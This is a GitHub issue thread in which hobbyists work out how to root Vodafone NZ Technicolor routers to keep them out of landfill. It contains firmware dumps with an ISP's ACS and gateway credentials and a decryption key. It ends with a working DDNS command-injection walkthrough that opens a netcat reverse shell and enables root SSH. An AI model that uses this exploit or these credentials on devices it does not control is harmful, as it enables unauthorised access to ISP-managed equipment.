Support for Technicolor DGA0130VDF (VANT-9) and DNA0130VDF (VBNT-Z) from Vodafone NZ

[drbenway6667]

Hi,

I have two vant-9 Technicolor 500-T Vodafone-DGA0130VDF-NZ boxes here I'm trying to unlock.
They run a custom firmware which I've been able to reverse engineer but not get code execution on
It runs an ssh server behind iptables. I've attached some of the firmware. Any help getting code execution here would be awesome to root these boxes get something open source running on them.

I've uploaded the extracted firmware + bins here:

 https://mega.nz/#F!kc9wHQhD!hN48b47_1o6NYixBML76xA

Heres some more info I've gathered on the device I'd be keen to try anything to get this unlocked
I'd be really keen to try any ideas that anyone may have. We have a heap of these in our country going to waste and it would be awesome to be able to save them from going in the trash

does anyone know if their is a way to get code execution on this device so I can build custom firmware on it

Cheers,
Henry

other firmware versions? CRF716 CRF725 
http://downloads.vodafone.co.nz/ultrahub_crf731.rbi 

Firmware-Version:           17.1.7875-2461002-CRF731
Productname:                  Vodafone Ultra Hub

    Dual Core Broadcom 400MHz CPU with 256MB DDR3 RAM
    DSL/WAN router
    1x ADSL/VDSL (RJ-11)
    3 x Gigabit Ethernet LAN (RJ45)
    1 x Gigabit Ethernet WAN (RJ45)
    2 x FXS for analogue phones, fax, pos (RJ11)
    1 x USB 2.0
    4G/3G HSPA via MBB USB stick
    VodafoneTV support
    Wi-Fi 11b/g/n/ac dual band concurrent: 5GHz Quantenna 4x4  MIMO and beam forming.  2,4GHz Broadcom 2x2
    DSL chipset - Bcm6303

: busybox [function [arguments]...]
   or: busybox --list
   or: function [arguments]...

        BusyBox is a multi-call binary that combines many common Unix
        utilities into a single executable.  Most people will create a
        link to busybox for each function they wish to use and BusyBox
        will act like whatever it was invoked as.

Currently defined functions:
        [, [[, addgroup, arping, ash, awk, base64, basename, bunzip2, bzcat, cat, chgrp, chmod, chown, chpasswd,
        chroot, chrt, clear, cmp, cp, crond, crontab, cut, date, dd, df, dhcprelay, dirname, dmesg, du, echo, egrep,
        env, expr, false, fdisk, fgrep, find, free, fsync, grep, gunzip, gzip, halt, head, hexdump, hostid, hwclock,
        id, ifconfig, insmod, kill, killall, less, ln, lock, logger, login, ls, lsmod, lsusb, md5sum, mkdir, mkfifo,
        mknod, mktemp, mount, mpstat, mv, nc, netmsg, netstat, nice, nslookup, ntpd, passwd, pgrep, pidof, ping, ping6,
        pivot_root, poweroff, printf, ps, pwd, readlink, reboot, reset, rm, rmdir, rmmod, route, sed, seq, sh,
        sha256sum, sleep, sort, start-stop-daemon, strings, switch_root, sync, sysctl, tail, tar, taskset, tee, telnet,
        test, time, timeout, top, touch, tr, traceroute, traceroute6, true, udhcpd, umount, uname, uniq, uptime,
        vconfig, vi, wc, wget, which, xargs, yes, zcat

OSCK Key: 89BCC09EABE21FA738E62E6D911FA80CAF091233ECCFF88442FAA5D7AF651A30
Encrypted data starts at 0x170
Detected board name: VANT-9
Known as: DGA0130

BoardName: VANT-9
Prodname: MediaAccess TG789Bvac
varname: TG789Bvac

/etc/shadow
root::0:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
mosquitto:x:0:0:99999:7:::

/etc/passwd
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
mosquitto:x:200:200:mosquitto:/var/run/mosquitto:/bin/false

# usr_admin (`Admin`) takes password based on gateway model
# The password Vodafone specifies is their commercial product name `VFH500-t`, prefixed with `VF-NZ`.
# At time of creation, Technicolor's VANT-9 is the only Vodafone board,
# hence this file is installed from that board-specific folder.
# If more Vodafone products are to be created, more customization may be needed.
# _set_salt_verifier "usr_admin" "VF-NZVFH500-t"

it said something about a management IP vlan? on eth4 (sfp) 8021q which allows access to ssh etc
192.168.10.2 255.255.255.0
192.168.2.2 255.255.255.0

#/*******************************************************************/
#/*               Vodafone specific rules ACCEPT                    */
#/*******************************************************************/
config ipset  'trusted_network'
	option external          'trusted_network'
	option storage           'hash'
	option match             'src_ip'

# Allow SSH
config rule 'Allow_SSH_Vodafone_wan'
	option name              'Allow-SSH-Vodafone-wan'
	option src               'wan'
	option proto             'tcp'
	option family            'ipv4'
	option dest_port         '22'
	option ipset             'trusted_network'
	option target            'DROP'

# Allow IPv4 ping from trusted networks
config rule 'Allow_Ping_Vodafone_wan_Trusted'
	option name              'Allow-Ping-Vodafone-wan-Trusted'
	option src               'wan'
	option proto             'icmp'
	option icmp_type         'echo-request'
	option family            'ipv4'
	option ipset             'trusted_network'
	option target            'ACCEPT'

# Allow IPv4 ping from all networks
config rule 'Allow_Ping_Vodafone_wan'
	option name              'Allow-Ping-Vodafone-wan'
	option src               'wan'
	option proto             'icmp'
	option icmp_type         'echo-request'
	option family            'ipv4'
	option target            'ACCEPT'
	option enabled           '0'

config rule 'Allow_Ping6_Vodafone_wan'
	option name              'Allow-Ping6'
	option src               'wan'
	option proto             'icmp'
	option icmp_type         'echo-request'
	option family            'ipv6'
	option target            'ACCEPT'
	option enabled           '0'

# Block HTTPS from LAN
config rule 'Block_HTTPS_Vodafone_lan'
	option name              'Block-HTTPS-Vodafone-lan'
	option src               'lan'
	option proto             'tcp'
	option dest_port         '443'
	option target            'ACCEPT'

# Allow SSH from LAN
config rule 'Allow_SSH_Vodafone_lan'
    option src                   'lan'
    option name                  'Allow-SSH-Vodafone-lan'
    option dest_port             '22'
    option target                'ACCEPT'

# Allow HTTP from LAN
config rule 'Allow_HTTP_Vodafone_lan'
    option src                   'lan'
    option name                  'Allow-HTTP-Vodafone-lan'
    option dest_port             '80'
    option target                'ACCEPT'

# Allow IPv4 ping from LAN
config rule 'Allow_Ping_Vodafone_lan'
    option src                   'lan'
    option name                  'Allow-Ping-Vodafone-lan'
    option proto                 'icmp'
    option target                'ACCEPT'

config include 'tod'
	option type		 'script'
	option path		 '/lib/functions/tod.sh'
	option reload		 '1'

config include 'intercept'
	option type		 'script'
	option path		 '/usr/lib/intercept/firewall.sh'

config include 'remote'
	option type	         'script'
	option path	         '/lib/functions/firewall-remoteaccess.sh'
	option reload	         '1'


config ipset 'trusted_network'
	option storage 'hash'
	list match 'src_ip'
	option enabled '1'
	option family 'ipv4'



config ipset_entry 'trusted_networkentry1'
	option ip '202.73.206.161'
	option ipset 'trusted_network'

config ipset_entry 'trusted_networkentry2'
	option ip '202.73.198.161'
	option ipset 'trusted_network'

config ipset_entry 'trusted_networkentry3'
	option ip '116.89.224.160'
	option ipset 'trusted_network'

config ipset_entry 'trusted_networkentry4'
	option ip '203.144.40.160'
	option ipset 'trusted_network'

config rule
        option target 'management_udp'
        option proto  'udp'
        option destports '53,67,68,500,4500'
        option priority '1'
config rule
        option target 'cwmpd'
        option destports '7547,51007'


  _______              __           __              __             
 |_     _|.-----.----.|  |--.-----.|__|.----.-----.|  |.-----.----.
   |   |  |  -__|  __||     |     ||  ||  __|  _  ||  ||  _  |   _|
   |___|  |_____|____||__|__|__|__||__||____|_____||__||_____|__|  
                 N E X T   G E N E R A T I O N   G A T E W A Y
 --------------------------------------------------------------------
 NG GATEWAY SIGNATURE DRINK
 --------------------------------------------------------------------
  * 1 oz Vodka          Pour all ingredients into mixing
  * 1 oz Triple Sec     tin with ice, strain into glass.
  * 1 oz Orange juice
 --------------------------------------------------------------------

Product: vant-9_vodafone
Release: Gold (17.1)
Version: 17.1.7988-2461029-20181022011356-cc42b789f8a7d5942c548fddfea7d5a7c0aabb4d


Hash config:         cc42b789f8a7d5942c548fddfea7d5a7c0aabb4d
Hash openwrt:        0b18280c71b895607da3be171d9364fac8cffda2
Hash kernel:         cccbe44b4b3c45eea532b78301202ed0e12c7ae4
Hash packages:       cb0b3da905a60ee9820e422ccb4b077bc11c03f3
Hash technicolor:    0fa80d604e8c6c4964c42b8734b0a0b6d74f0bfc
Hash routing:        2dc9f5ceb468d8f9bcbcb7ac0ab7719ba4e7a876
Hash lte:            63fad0a763f5b26af14fe6df7fbfe725d92574ce
Hash mindspeed:      cd5df6841bf54c8c1d7e716ce22d0afa2fef66e5
Hash custo:          47fa351dff41330b200cabf2d5d4063b24a5b1ac

RBI Firmware info
        option company_name 'Technicolor'
        option prod_friendly_name 'Vodafone-DGA0130VDF-NZ'
        option prod_name 'MediaAccess'
        option prod_number 'Vodafone-DGA0130VDF-NZ'
        option ssid_prefix 'vodafone'
        option CPE_MODEL 'DGA0130VDF-NZ'
        option provisioning_code 'VFNZ'
        option CONF_VERSION 'CRF897'
		option vodafone_variant 'NZ'

config settings 'tr69clientconfiguration'
	option inform '1'
	option inform_interval '3600'
	option acs_url http://xvfnzhdmw.xdev.motive.com/cwmpWeb/CPEMgt
	option acs_username 'vfnz_hdm'
	option acs_password 'VF-dkpeh43f-t'
	option connection_req_username 'vfnz_hdm'
	option connection_req_password 'VF-dkpeh43f-t'

/etc/cwmpd
	option acs_url https://pvfnzhdmw.vfnz.motive.com/cwmpWeb/WGCPEMgt
	option periodicinform_interval 3600
	option acs_user "vfnz_hdm"
	option acs_pass "dkpeh43f"
	option state 1
	option upgradesmanaged '1'
	option interface 'wan'
	option connectionrequest_auth '1'
	option connectionrequest_allowedips '199.117.180.0/24,207.71.32.0/24,216.61.48.0/24,64.186.176.0/24,64.186.180.0/24,64.186.183.0/24,64.186.187.0/24,64.186.188.0/24,64.186.189.0/24,64.186.191.0/24'
	option upgrade_rollback_timeout 300
	option connectionrequest_port 51005
	option ssl_castore '/etc/ssl/certs/'
	option ssl_verifypeer '1'
	option ssl_hostnamecheck '1'
	option use_dhcp '0'
	option enforce_https '1'
	option backoff_minwait '5'
	option backoff_multiplier '2000'
	option periodicinform_enable '1'

/etc/snmpd
config system
	option sysLocation	'office'
	option sysContact	'bofh@example.com'
	option sysName		'HeartOfGold'
#	option sysServices	72
#	option sysDescr		'adult playground'
#	option sysObjectID	'1.2.3.4'

config 'values' 'config'
	option base_url 'https://vodafone:ey5haezuv9aeliWu@vodafone-gw.tgwfd.org:8443/'
	option core_url 'https://vodafone-core.tgwfd.org:5443/'
	option fifo_dir '/tmp/gwfd'
	option flush_size '30'
	option flush_interval '900'
	option enable '0'
	option tag 'VodafoneFT'

http://192.168.1.1:5000/rootDesc.xml

PORT     STATE SERVICE
1900/udp open  upnp
| upnp-info: 
| 192.168.1.1
|     Server: OpenWRT/OpenWrt/Attitude_Adjustment__r43446_ UPnP/1.1 MiniUPnPd/1.8
|_    Location: http://192.168.1.1:5000/rootDesc.xml

[drbenway6667]

CRF NUMBER#: CRF897
and option fwversion_suffix '-CRF897-RC2-4-9'

[kevdagoat]

Hello,

Have you tried AutoFlashGUI on this model?

Could you please post some screenshots of the web GUI

Edit:
After reading through the firmware, you should be able to disable cwmp, go to http://ip/modals/tr069.lp

And no, ssh is not running at all, even behind iptables

[drbenway6667]

Hi kevdagoat,

appreciate the reply. The model is not available in AutoFlashGUI.
What options would you recommend trying? Their is full source code of the web gui in lua in the mega
I'll upload some screenshots now
I'll look into the /tr069.lp now!

That's interesting. I think their must be a script somewhere to start it as their is a heap of preconfigured ip addresses that seem to be excempt in the iptables routes

Give me 5 and I'll get back to you :)
would be awesome to get into this thing

[drbenway6667]

[drbenway6667]

/modals/tr069.lp gives a 404 Not Found from nginx

[drbenway6667]

![Upl

oading 2019-12-10-233253_1360x768_scrot.png…]()

[drbenway6667]

I've tried AutoFlashGUI on the different options just now.

I'm using python3 on debian

autoflashgui/libautoflashgui.py", line 55, in srp6authenticate
print(_("Exception: ") + str(sys.exc_info()[0]))
NameError: name 'sys' is not defined

/autoflashgui/libautoflashgui.py", line 25, in srp6authenticate
token = br.find(lambda tag: tag.has_attr('name') and tag['name'] == 'CSRFtoken')['content']
TypeError: 'NoneType' object is not subscriptable

and other errors, not sure if it's a OS issue, dependency issue or more likely the web interface isn't programmed into the tool

[LuKePicci]

Give up on AFG for this device, it's made for the stock tch webui.
You can't get custom firmware to boot, you are limited to root access into that Homeware firmware.

First chance, set your pc ip to a trusted one and try logging in. Check dropbear settings to determine ifpassword login is allowed and check if it is set by uci-defaults scripts.
Second chance, do some evaluations on the VDF deployment in NZ: is it using cwmp over DHCP or PPPoE interface? Does this device support ethernet wan connection in its default firmware state or is it limited to builtin dsl modem? Depending on the answers, and default cwmp settings, tch-exploit or could be viable, otherwise it will require more advanced care to get something similar to work properly.

Also check the vdf webui samba configuration form. Is it allowing arbitrary hostname or workgroup with no proper escaping? If yes, you can try something equivalent to root strategy # 1

Maybe @jameskeenan295 may help you as he already managed to get something for vant-9

[LuKePicci]

BTW let me use this thread to update you on VANT-9 & VBNT-Z support progress, here is a checklist to complete for getting it listed on the repo.

VANT-9:

• ✔ Commercial name: Ultra Hub
• ✔ OSCK
• ✔ RBI firmwares
• ✔ Official links to RBI firmwares
  • ✔ 17.1.7875-2461002-CRF731 http://downloads.vodafone.co.nz/ultrahub_crf731.rbi
  • ✔ 17.1.7988-2461009-20180510014336-RC2.4.6_prod_AUTH_vant-9 https://downloads.vodafone.co.nz/ultrahub/RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336.rbi
  • ✔ 17.1.7988-2461029-CRF897-RC2-4-9 http://downloads.vodafone.co.nz/ultrahub/DGA-2-4-9-Prod.rbi
• ✔ Firmware Types
  • Type definitions: https://github.com/kevdagoat/hack-technicolor/#firmware-types
  • ✔ 17.1.7875-2461002-CRF731 Type1
  • ✔ 17.1.7988-2461009-20180510014336-RC2.4.6_prod_AUTH_vant-9 Type2
  • ✔ 17.1.7988-2461029-CRF897-RC2-4-9 Type1
• 🧭 Rooting Strategy
  • How you got root? OWASP ZAP for DDNS command injection
  • LuKe's comment: this is gonna be integrated into strategy #A after AFG patches get merged

VBNT-Z:

• ✔ Commercial name: Ultra Hub Plus
• ✔ OSCK
• ✔ RBI firmwares
• ✔ Official links to RBI firmwares
  • 17.4.0182-0841014-20180413074043 http://downloads.vodafone.co.nz/ultrahub-plus/UHP-2-0-1-Prod.rbi
• ✔ Firmware Types
  • Type definitions: https://github.com/kevdagoat/hack-technicolor/#firmware-types
  • 17.4.0182-0841014-20180413074043 Type2
• 🧭 Rooting Strategy
  • How you got root? OWASP ZAP for DDNS command injection
  • LuKe's comment: this is gonna be integrated into strategy #A after AFG patches get merged

[drbenway6667]

Sorry for my ambivalence but what is the best way to set one of these trusted IP's as mine on a local network? At the moment I am connected directly to the router via my eth port to it's eth port-
Do the connections need to come from the WAN or could they come from the lan?
I'm just a bit confused as to how I communicate with it being on a /24 subnet and the trusted ip addresses being on the internet- I'm about to go look into samba, and get back to you that. It lets you provide a static IP Address on the WAN connection using ipoe. Are you thinking of impersonating an ACL to push out the firmware? I wish I had a hub lying around it would make this a hell of a load easier.

Appreciate the help and enjoying the learning
henry

[LuKePicci]

You can set whatever IP on your nic and connect to your router wan port to try entering the already enabled ssh instance.
You may (it depends on configs) try doing the same as tch-exploit does to change the ACS URL of the router and then manage it via CWMP to push STS scripts. You could also piush firmwares but that's not a big deal as you can do it already (edit: I just saw you already attached cwmpd settings above, that setup doesn't allow tch-exploit or similar ways in)
You can try finding some other weakness of that custom webui to get command execution.
I suggest you focus on the thing that you like the most and go that way.

[drbenway6667]

So dropbear doesnt allow password login and I can't seem to get it to talk to devices through wan with a static ip address and vlan set to 0

The cwmp does not use dhcp
but does check for hostnames, verify the peer, and uses https/ssl
it also seems to limit the access via connectionrequest_allowedips

I mapped out the miniupnp server and was thinking of trying to port forward dropbear but that fails aswell.

urn:schemas-upnp-org:service:Layer3Forwarding:1:
SCPD_URL: http://192.168.1.1:5000/bFUgIPn/L3F.xml
CTRL_URL: http://192.168.1.1:5000/bFUgIPn/ctl/L3F

urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1:
SCPD_URL: http://192.168.1.1:5000/bFUgIPn/WANCfg.xml
CTRL_URL: http://192.168.1.1:5000/bFUgIPn/ctl/CmnIfCfg

urn:schemas-upnp-org:service:WANIPConnection:1:
SCPD_URL: http://192.168.1.1:5000/bFUgIPn/WANIPCn.xml
CTRL_URL: http://192.168.1.1:5000/bFUgIPn/ctl/IPConn

I'm not 100% sure if this would lead to anything but the dynamic dns configuration screen does not seem to sanitize input too much. It replaces quotes " with " but otherwise seems like an entry point
i think it gets passed off to openwrts ddns which is configured to use curl (possible command injection?)

/www/docroot/modals/dns-ddns.lp

[drbenway6667]

When you say you can also push firmwares you mean through a mitm acs?

I'm just wondering if we already have the firmware decrypted if their is a way to build a new 'patched' update that can be used via the web interface as if a regular update and sign it somehow using keys from the system

I'm poking around the web-interface but it's all written in lua which is new coming from python so not 100% sure on where to look for syntax etc
If I could figure out how to get a wan connection working I could try to impersonate the ACS
I'm not sure what I'm doing wrong in the wan config
e.g
802.1P Priority [0-7]: 0
802.1Q VLAN ID [0-4094]: 0
WAN IP Address : 172.16.0.2
WAN Subnet Mask: 255.255.0.0
WAN Gateway IP Address: 172.16.0.1

When I connect this to a network with a network running an a modem on 172.16.0.1 I cannot ping 172.16.0.2 or connect to the enabled remote assistance web interface as expected it's weird.

These modems have some sort of recovery mode when you hold down the reset as it powers on
is their any way to boot modified firmware over tftp for example

[LuKePicci]

@jameskeenan295 was capable of command execution via that DDNS form as well on the 2.4.6 firmware. Once you manage do execute some commands, let me know, I have something for you to try. In particular I'm interested in knowing if creating a new dropbear instance would not need us to enable that firewall deny option you saw.

[LuKePicci]

Give up on any CWMP trick on these, I just looked at the above cwmpd settings you posted, they definitely prevent any mitm.
You can't load patched firmware, everything in Secure Boot enabled devices is signed and verified on boot, you can read the wiki about that for more information if you like.

[drbenway6667]

Thanks @LuKePicci
Do you have any ideas on a suitable query to try?
or what worked for @jameskeenan295 back in the day?

I'll keep you updated! I've used dropbear in the past on another arm camera with a precompiled binary, once you generate the keys you can make one big command that starts dropbear on another port with other keys etc

Well cross fingers we can find some command injection but they sanitize mostly everything at least from the frontend it seems. I found a link to an older version of the firmware but cloudfront /vodafone seems to be having issues and I cant download it at the moment. If anyone has a copy of any older firmware would be much appreciated as I look for a way in.

https://downloads.vodafone.co.nz/ultrahub/RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336.rbi

cheers for the support

[LuKePicci]

Give me a mega drop folder where to put them. Probably that link you posted is the correct one even if it is now returning "access denied", this means I could already build torrents for all of them.

[drbenway6667]

https://mega.nz/megadrop/8DWXMIKmdJA
I'm 99% sure that the link is correct it's from the waybackmachine
I think cloudfront got put into some ddos mode everything in the /ultrahub/ folder is returning the error
Awesome @LuKePicci, appreciate the wizard magic, I'd really like to get in on the wizard magic (henry@str8up.media)
I'll keep you posted as I get this firmware loaded and see what I can do from their

[drbenway6667]

Alright weird, so it says its a 17.1.7988-2461009-CRF846-V2.4.6 but this is definitely an earlier version.
I think I managed to break the ddns updater as I can't turn it on or off which makes me think that I've corrupted it, I'm resetting the firmware and trying to build an exploit. I think maybe what broke it was ";sleep 30 in the username field but I'm kind of scratching my head on how to get into it still.
Has this older firmware got any exploits you can spot I could try to work with?

[LuKePicci]

Sure, just try simple commands with noticeable effects, like reboot. Then, setting up a permanent ssh server is only a matter of configuring some settings which are now disabling it.
This is the "standard" command block for opening up a local dropbear instance:

echo root:root | chpasswd
sed -i 's#/root:.*\$#/root:/bin/ash#' /etc/passwd
sed -i 's/#//' /etc/inittab
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart

[drbenway6667]

I still haven't been able to figure out the exact string to get the command injection to work. All I know so far is putting the quotation marks in the username field breaks the module somehow-
I'd be happy to write a selenium function once we figure it out that we could put into the autoflashgui or have someone translate to the roboframework to automatically root these devices
Thanks for the help and progress everyone

I've tried :::::::;reboot in the ping and ddns sections and it doesn't work but doesn't break the module
the switches stop working when you use a quotation mark and you have to factory reset the unit to load another ddns configuration

edit: I'm taking a break for a while if anyone has any ideas on command execution injections or wants me to portforward the administration interface for them to try get into let me know

[LuKePicci]

I don't know if commands get executed when ddns scripts run or previously during configuration. However you don't need to go black-box. I would suggest you to try looking into the webui code back to the point where ddns configuration is saved and determine where the injection happens. Also, a comparison with newer patched firmware might be of some help.

[drbenway6667]

I'm having a look into firmware RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336 today

The new iptables rules appear to allow access to port 22 on the local system and nmap is reading it as filtered, although the dropbear daemon is not running, from the firmware their is a root account but it does not look like a password is set.

I've attached the ddns updater source code. It appears to use the openwrt ddns updater as a backend (https://oldwiki.archive.openwrt.org/doc/uci/ddns)

It also uses an old version of this script here which is what I am trying to target. It appears to not filter the password as it could contain special characters. I wish I knew lua so am trying to target the bash side of the script. You can set quotation marks etc in the password field and it doesn't break the configuration which is making testing params quicker rather than every test requiring a reboot.

I want to try and exploit this no-ip-updater shell script somehow

#.Distributed under the terms of the GNU General Public License (GPL) version 2.0
#.2014-2015 Christian Schoenebeck <christian dot schoenebeck at gmail dot com>
local __DUMMY
local __UPDURL="http://[USERNAME]:[PASSWORD]@dynupdate.no-ip.com/nic/update?hostname=[DOMAIN]&myip=[IP]"
[ -z "$username" ] && write_log 14 "Service section not configured correctly! Missing 'username'"
[ -z "$password" ] && write_log 14 "Service section not configured correctly! Missing 'password'"
[ $use_ipv6 -eq 0 ] && __DUMMY="127.0.0.1" || __DUMMY="::1"
write_log 7 "sending dummy IP to 'no-ip.com'"
__URL=$(echo $__UPDURL | sed -e "s#\[USERNAME\]#$URL_USER#g" -e "s#\[PASSWORD\]#$URL_PASS#g" \
-e "s#\[DOMAIN\]#$domain#g" -e "s#\[IP\]#$__DUMMY#g")
[ $use_https -ne 0 ] && __URL=$(echo $__URL | sed -e 's#^http:#https:#')
do_transfer "$__URL" || return 1
write_log 7 "'no-ip.com' answered:\n$(cat $DATFILE)"
grep -E "good|nochg" $DATFILE >/dev/null 2>&1 || return 1
sleep 1
write_log 7 "sending real IP to 'no-ip.com'"
__URL=$(echo $__UPDURL | sed -e "s#\[USERNAME\]#$URL_USER#g" -e "s#\[PASSWORD\]#$URL_PASS#g" \
-e "s#\[DOMAIN\]#$domain#g" -e "s#\[IP\]#$__IP#g")
[ $use_https -ne 0 ] && __URL=$(echo $__URL | sed -e 's#^http:#https:#')
do_transfer "$__URL" || return 1
write_log 7 "'no-ip.com' answered:\n$(cat $DATFILE)"
grep -E "good|nochg" $DATFILE >/dev/null 2>&1
return $?

I've tried some arguments such as:

") && reboot && echo (
"] && reboot && echo 
"];`reboot`
"];reboot;
";reboot;
;reboot
";`reboot`

but haven't been able to quite get the syntax right. Is it possible to inject a command in this script?
The lua script uses a bit of regex and filtering to validate the input and sets the uci variables for either the ddns script dynamic_dns_updater.sh or update_no-ip_com.sh if it is configured for no-ip.com to be called when an update is needed or the configuration changes

Attached are the relevant files
ddns_files.zip

[flywire]

I wish I knew lua

https://hack-technicolor.readthedocs.io/en/stable/Resources/#lua

https://hack-technicolor.readthedocs.io/en/stable/Resources/#busybox-ash

[kevdagoat]

Have you tried this: domain.com;<command>

…

On 13 Dec 2019, at 7:45 am, drbenway6667 ***@***.***> wrote:  I'm having a look into firmware RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336 today The new iptables rules appear to allow access to port 22 on the local system and nmap is reading it as filtered, although the dropbear daemon is not running. I've attached the ddns updater source code. It appears to use the openwrt ddns updater as a backend (https://oldwiki.archive.openwrt.org/doc/uci/ddns) It also uses an old version of this script here which is what I am trying to target. It appears to not filter the password as it could contain special characters. I wish I knew lua so am trying to target the bash side of the script. You can set quotation marks etc in the password field and it doesn't break the configuration which is making testing params quicker rather than every test requiring a reboot. I want to try and exploit this no-ip-updater shell script somehow ` #.Distributed under the terms of the GNU General Public License (GPL) version 2.0 #.2014-2015 Christian Schoenebeck local __DUMMY local ***@***.***/nic/update?hostname=[DOMAIN]&myip=[IP]" [ -z "$username" ] && write_log 14 "Service section not configured correctly! Missing 'username'" [ -z "$password" ] && write_log 14 "Service section not configured correctly! Missing 'password'" [ $use_ipv6 -eq 0 ] && __DUMMY="127.0.0.1" || __DUMMY="::1" write_log 7 "sending dummy IP to 'no-ip.com'" __URL=$(echo $__UPDURL | sed -e "s#[USERNAME]#$URL_USER#g" -e "s#[PASSWORD]#$URL_PASS#g" -e "s#[DOMAIN]#$domain#g" -e "s#[IP]#$__DUMMY#g") [ $use_https -ne 0 ] && __URL=$(echo $__URL | sed -e 's#^http:#https:#') do_transfer "$__URL" || return 1 write_log 7 "'no-ip.com' answered:\n$(cat $DATFILE)" grep -E "good|nochg" $DATFILE >/dev/null 2>&1 || return 1 sleep 1 write_log 7 "sending real IP to 'no-ip.com'" __URL=$(echo $__UPDURL | sed -e "s#[USERNAME]#$URL_USER#g" -e "s#[PASSWORD]#$URL_PASS#g" -e "s#[DOMAIN]#$domain#g" -e "s#[IP]#$__IP#g") [ $use_https -ne 0 ] && __URL=$(echo $__URL | sed -e 's#^http:#https:#') do_transfer "$__URL" || return 1 write_log 7 "'no-ip.com' answered:\n$(cat $DATFILE)" grep -E "good|nochg" $DATFILE >/dev/null 2>&1 return $? ` I've tried some arguments such as: ") && reboot && echo ( "] && reboot && echo "];reboot "];reboot; ";reboot; ;reboot ";reboot but haven't been able to quite get the syntax right. Is it possible to inject a command in this script? The lua script uses a bit of regex and filtering to validate the input and sets the uci variables for the ddns script dynamic_dns_updater.sh which in turn calls the update_no-ip_com.sh if it is configured for no-ip.com Attached are the relevant files ddns_files.zip — You are receiving this because you commented. Reply to this email directly, view it on GitHub, or unsubscribe.

[jameskeenan295]

The tricks for getting root shell on VANT-9 are:

1. Use TFTP to downgrade firmware to known vulnerable version:
   17.1.7988-2461009-CRF846-V2.4.6
   Older and newer firmware's don't have the DDNS vuln.

1.1) (not always required) If you've tried TFTP flashing and it still comes up with a version number different to that above, then you need to trigger a bank switch, as follows:
Set a continuous ping to the LAN IP (192.168.1.1)
In WebUI, follow the normal steps to upgrade firmware, but use the same or newer version RBI to whatever its currently on (if you try to flash a lower version, it wont work)
While its flashing, continue to watch the continuous ping.
As soon as the flash finishes, and the continuous ping drops, POWER OFF the router to prevent it booting the newly flashed firmware. That should have caused it to bank-switch to Bank1, so now you can do your TFTP flash to 17.1.7988-2461009-CRF846-V2.4.6 and it should boot that from Bank1. TFTP always flashes Bank1 only.

There are other methods for doing Bank Switches, but this is fairly straight forward.

2. Use OWASP ZAP to launch a firefox, log into the router webui with your normal creds (username: vodafone & the password from the sticker on foot of router), change to advanced, go to Internet, DDNS, enable it, choose DynDNS.org, and enter something like test.com as the domain name, any username and any password, Apply the settings.

in OWASP ZAP, search for "test.com" (or whatever domain you used), then right-click the request >>Open/Resend with request Editor

Inject commands, using a semicolon immediately after the domain name (test.com or whatever you used):
2.1) example: On windows laptop start an ncat listener: ncat -l 5000
inject this immediately after test.com, where 192.168.1.5 is your laptop LAN IP:
%3Bnc+192.168.1.5+5000+-e+%2Fbin%2Fsh

That is the URL encoded form of: ;nc 192.168.1.5 5000 -e /bin/sh

2.2) Assuming that works, you should now have a shell (as root) on the Windows ncat session.
test it by entering "ls" (without quotes), and there may be a small delay, but you should get a directory listing which confirms you're in!

From there you need to enter these commands through the ncat session:
sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;
uci set dropbear.wan.enable='0';
uci set dropbear.lan.enable='1';
uci set dropbear.lan.RootPasswordAuth=on;
uci set dropbear.lan.RootLogin=1
uci set firewall.Allow_SSH_Vodafone_lan.target='ACCEPT';
uci commit;
/etc/init.d/firewall restart;
/etc/init.d/dropbear restart;

3. All going well, you now have semi-permanent SSH access to the router on port 22, that survives reboots.
   You will lose it if you upgrade the firmware, and/or if you leave CWMP enabled, then Vodafone may force a firmware upgrade on it, and / or otherwise block access.

Notes:

• You could also inject all the commands using HTTP through the DDNS vuln, but it easy/fast enough to do it through the ncat session. your mileage may vary.

• Interestingly, if you upgrade firmware on a rooted VANT-9, the ssh access remains (port 22 is open, and you can initiate a connection to dropbear, but /etc/passwd is changed back to root:/bin/false so as soon as you authenticate, it drops the connection.

• Vodafone Ultrabub Plus (VBNT-Z) rooting process is same as the above, but its easier because they only have one firmware version (and its vulnerable to the same DDNS bug), so you don't have to do any TFTP downgrades.

• VBNT-Z doesnt have the default firewall rule blocking port 22, so you dont need to use this command on VBNT-Z
  uci set firewall.Allow_SSH_Vodafone_lan.target='ACCEPT';

• I've got some code on my github for automatically extracting the ECK (and OSCK, for decrypting the RBI files) from memory dumps on these devices that have /dev/mem exposed. I realise that its more just an academic curiosity to do this considering the OSCK is already leaked, but a bit of fun if you're into that sort of thing.

Feel free to contact me if that doesn't work, or you need any more info.

I am hoping we can get the rooting process implemented into AutoFlashGUI (or something similar?) to make it easier for the everyone. Hardware needs to be liberated, man!

Also, Vodafone NZ have implemented a few subtle things in the default config to prevent people using these routers with other ISP's, so there is some additional liberation work required there from this community, to make these usable by all.

[febs112]

Great job everyone! Very glad to see someone is working on this as so many it these little routers are going to landfill unnecessarily!

[nicefile]

Does anybody know if H500-s and H500-t here mentioned are sharring exact same spec just different manufacturer ? S Sercom T Technicolor ? I'm dying to break my H500s :)

[LuKePicci]

Usually they have different firmwares but similar housing, specs and web interface UI.

[gingming]

Hello guys,

